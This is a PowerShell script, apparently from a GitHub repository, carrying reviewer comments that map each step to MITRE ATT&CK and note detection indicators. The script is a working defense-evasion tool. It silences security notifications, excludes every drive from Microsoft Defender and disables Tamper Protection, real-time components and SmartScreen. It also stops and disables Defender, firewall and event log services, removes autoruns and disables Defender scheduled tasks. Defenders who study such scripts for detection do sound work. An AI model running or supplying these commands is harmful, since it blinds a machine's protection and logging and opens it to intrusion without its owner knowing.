# --- Author: zetod1ce (github.com/ztd38f) --- #
# --- DISCLAIMER: Provided as-is, without warranties. For educational and testing use only in controlled environments. Use at your own risk. --- #

# Overview (review notes):
#   PowerShell script that turns off Microsoft Defender features, security
#   notifications, SmartScreen and several Windows services by writing registry
#   values, changing service start types and disabling scheduled tasks.
#   It maps to MITRE ATT&CK T1562.001 (Disable or Modify Tools); step 8 also
#   touches T1562.002 (Disable Windows Event Logging) and T1562.004 (Disable or
#   Modify System Firewall), because the service list includes EventLog,
#   Wecsvc, MpsSvc and BFE.
#   No exit status is checked anywhere, so the final "Done." is printed whether
#   or not any individual write succeeded.
#   The HKLM writes require an elevated session. Every registry path, service
#   name and task name below is usable as a detection indicator when it appears
#   in registry-write or process command-line telemetry (reg.exe / schtasks.exe
#   launched from PowerShell).

# 0. Disabling all Defender and system notifications
# Suppresses the toast and Security Center notifications that would otherwise
# tell the signed-in user that protection was changed. The HKCU values affect
# only the current user; the HKLM values are machine-wide.
Write-Host "0. Disabling all Defender and system notifications" -f Yellow
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance" /v "Enabled" /t REG_DWORD /d 0 /f
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SmartAppControl" /v "Enabled" /t REG_DWORD /d 0 /f
reg add "HKCU\Software\Policies\Microsoft\Windows\CurrentVersion\PushNotifications" /v "NoToastApplicationNotification" /t REG_DWORD /d 1 /f
reg add "HKCU\Software\Policies\Microsoft\Windows\Explorer" /v "DisableNotificationCenter" /t REG_DWORD /d 1 /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d 1 /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableEnhancedNotifications" /t REG_DWORD /d 1 /f
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\PushNotifications" /v "ToastEnabled" /t REG_DWORD /d 0 /f
# Each listed value name is written as DWORD 0 under the per-user notification settings key.
("EnableNotifications","EnableToastApplicationNotification","NOC_GLOBAL_SETTING_TOASTS_ENABLED") |% {reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings" /v "$_" /t REG_DWORD /d 0 /f}
# Each listed value name is written as DWORD 1 under the (non-policy) Security Center notifications key.
("DisableNotifications","DisableEnhancedNotifications","DisableMonitoring","DisableAlerts","DisableNotificationsUI","DisableNotificationCenter") |% {reg add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v "$_" /t REG_DWORD /d 1 /f}

# 1. Blinding Defender (System-wide Exclusion)
# Creates the policy key for path exclusions, then, for the root of every
# FileSystem drive, adds a value named after that root and also registers the
# same root through Add-MpPreference. The result is an exclusion covering whole
# volumes rather than a specific folder.
# Defender note: exclusions can be audited with Get-MpPreference (ExclusionPath);
# a drive root appearing there, or under the Exclusions\Paths policy key, is a
# strong indicator on its own.
Write-Host "1. Blinding Defender (System-wide Exclusion)" -f Yellow
(ni "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" -force)
((gdr -psp FileSystem).Root |% {New-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" -n $_ -pr string -v "" -force; Add-MpPreference -ExclusionPath $_ -force})

# 2. Disabling TamperProtection
# Writes TamperProtection = 0 under the Defender Features key.
# NOTE(review): Tamper Protection exists to block exactly this kind of change;
# on hosts where it is enforced this write is expected to be rejected. Keeping
# it enabled and centrally managed is the documented mitigation -- confirm the
# state on the builds you operate.
Write-Host "2. Disabling TamperProtection" -f Yellow
reg add "HKLM\Software\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d 0 /f

# 3. Disabling Controlled Folder Access
# Sets the Controlled Folder Access preference to Disabled through the Defender cmdlet.
Write-Host "3. Disabling Controlled Folder Access" -f Yellow
Set-MpPreference -EnableControlledFolderAccess Disabled

# 4. Defender and Component Disable Policies
# Only the banner below and the function definition run here: the sole call to
# Disable-DefenderPolicies (after the closing brace) is commented out, so none
# of the policy values inside the function are written when the script is run
# as published.
Write-Host "4. Defender and Component Disable Policies" -f Yellow
function Disable-DefenderPolicies {
    # Writes Group Policy-style values under HKLM\Software\Policies\Microsoft\Windows Defender.
    # Takes no parameters and returns nothing beyond the reg.exe console output.

    # Two values under the Defender policy root are written as 0.
    ("AllowFastServiceStartup","ServiceKeepAlive") |% {reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "$_" /t REG_DWORD /d 0 /f}
    # MpEnablePus = 0 under the MpEngine policy key (presumably potentially-unwanted-software detection -- confirm).
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d 0 /f
    # Three "Disable*" values under the policy root are written as 1.
    # NOTE(review): Microsoft documents DisableAntiSpyware as ignored on current
    # client builds; its presence is still a useful detection indicator.
    ("DisableAntiSpyware","DisableAntiVirus","DisableSpecialRunningModes") |% {reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "$_" /t REG_DWORD /d 1 /f}
    # Six "Disable*" values under the Real-Time Protection policy key are written as 1.
    ("DisableBehaviorMonitoring","DisableIOAVProtection","DisableOnAccessProtection","DisableRealtimeMonitoring","DisableRoutinelyTakingAction","DisableScanOnRealtimeEnable") |% {reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "$_" /t REG_DWORD /d 1 /f}
    # Cloud protection (SpyNet/MAPS) policy values: reporting 0, block-at-first-seen
    # disabled, sample-submission consent 2.
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d 0 /f
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d 1 /f
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f
}
# Disable-DefenderPolicies

# 5. Disabling SgrmBroker and SecurityHealthService
# Sets the service Start value to 4 (disabled) directly in the registry rather
# than through the Service Control Manager. Both services appear again in the
# step 8 list.
Write-Host "5. Disabling SgrmBroker and SecurityHealthService" -f Yellow
("SgrmBroker","SecurityHealthService") |% {reg add "HKLM\System\CurrentControlSet\Services\$_" /v "Start" /t REG_DWORD /d 4 /f}

# 6. Disabling WMI Autologger for Defender
# Sets Start = 0 on the two Defender autologger trace sessions.
Write-Host "6. Disabling WMI Autologger for Defender" -f Yellow
("DefenderApiLogger","DefenderAuditLogger") |% {reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\$_" /v "Start" /t REG_DWORD /d 0 /f}

# 7. Disabling Defender Scheduled Tasks
# Disables the ExploitGuard MDM policy refresh task and the four tasks under
# Microsoft\Windows\Windows Defender.
Write-Host "7. Disabling Defender Scheduled Tasks" -f Yellow
schtasks /Change /tn "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /disable
("Windows Defender Cache Maintenance","Windows Defender Cleanup","Windows Defender Scheduled Scan","Windows Defender Verification") |% {schtasks /change /tn "Microsoft\Windows\Windows Defender\$_" /disable}

# 8. Disabling core protection services
# For every name in the list: force-stop the service, set its startup type to
# Disabled, then write Start = 4 and AutorunsDisabled = 3 under its Services
# key. "-ea 0" silences errors from the two cmdlets, so a refused stop or
# start-type change leaves no console output.
# The list reaches beyond Defender: MpsSvc and BFE belong to the Windows
# firewall stack, and EventLog / Wecsvc are the event log and event collector
# services. "MpsSvc" and "mpssvc" name the same service; SgrmBroker and
# SecurityHealthService repeat step 5.
# Defender note: once EventLog is stopped, host-local logs stop being a
# reliable record; detection should rely on telemetry already forwarded off
# the host and on the gap itself.
# NOTE(review): the meaning of AutorunsDisabled = 3 is not shown in this file.
Write-Host "8. Disabling core protection services" -f Yellow
("Sense","webthreatdefsvc","webthreatdefusersvc","WdNisSvc","WdNisDrv","MDCoreSvc","SgrmBroker","SecurityHealthService","wscsvc","WinDefend","WdFilter","WdBoot","MpsSvc","mpssvc","BFE","Wecsvc","EventLog") |% {spsv $_ -force -ea 0; Set-Service $_ -st Disabled -ea 0; reg add "HKLM\System\CurrentControlSet\Services\$_" /v "Start" /t REG_DWORD /d 4 /f; reg add "HKLM\System\CurrentControlSet\Services\$_" /v "AutorunsDisabled" /t REG_DWORD /d 3 /f}

# 9. Removing SecurityHealth autoruns
# Deletes the "SecurityHealth" value from the machine-wide Run key and from its
# StartupApproved counterpart.
Write-Host "9. Removing SecurityHealth autoruns" -f Yellow
("Explorer\StartupApproved\Run","Run") |% {reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\$_" /v "SecurityHealth" /f}

# 10. Removing EPP context menus
# Deletes the EPP context-menu handler key for all files, directories and drives.
Write-Host "10. Removing EPP context menus" -f Yellow
("*","Directory","Drive") |% {reg delete "HKCR\$_\shellex\ContextMenuHandlers\EPP" /f}

# 11. Disabling SmartScreen and related features
# Turns SmartScreen off for Explorer (machine-wide) and writes 0 to the default
# (unnamed) value -- that is what /ve selects -- of two per-user Edge keys.
# Also clears web content evaluation for the current user and writes 0 to
# several values under the Code Integrity (CI) control key.
# NOTE(review): the exact effect of the CI values (VerifiedAndReputablePolicyState,
# SvcEnabled, ServiceStart, ServiceState) is not established by this file.
Write-Host "11. Disabling SmartScreen and related features" -f Yellow
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t REG_SZ /d Off /f
("SmartScreenEnabled","SmartScreenPuaEnabled") |% {reg add "HKCU\Software\Microsoft\Edge\$_" /ve /t REG_DWORD /d 0 /f}
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t REG_DWORD /d 0 /f
reg add "HKLM\SYSTEM\CurrentControlSet\Control\CI\Policy" /v "VerifiedAndReputablePolicyState" /t REG_DWORD /d 0 /f
("SvcEnabled","ServiceStart","ServiceState") |% {reg add "HKLM\SYSTEM\CurrentControlSet\Control\CI" /v "$_" /t REG_DWORD /d 0 /f}

# Printed unconditionally; it does not indicate that any step above succeeded.
Write-Host "Done." -f Green